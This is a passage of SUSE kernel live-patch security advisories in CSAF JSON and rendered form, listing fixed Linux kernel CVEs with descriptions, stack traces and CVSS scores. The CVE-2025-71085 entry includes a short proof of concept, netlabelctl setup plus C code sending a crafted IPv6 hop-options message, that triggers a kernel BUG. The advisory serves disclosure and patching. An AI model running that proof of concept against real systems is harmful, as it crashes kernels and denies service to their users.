\u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1089-1
Vulnerability from csaf_suse - Published: 2026-03-26 17:34 - Updated: 2026-03-26 17:34Summary
Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.65 fixes various security issues
The following security issues were fixed:
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1089,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1089
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
44 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.65 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1089,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1089",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1089-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1089-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261089-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1089-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024960.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 14 for SUSE Linux Enterprise 15 SP6)",
"tracking": {
"current_release_date": "2026-03-26T17:34:58Z",
"generator": {
"date": "2026-03-26T17:34:58Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1089-1",
"initial_release_date": "2026-03-26T17:34:58Z",
"revision_history": [
{
"date": "2026-03-26T17:34:58Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
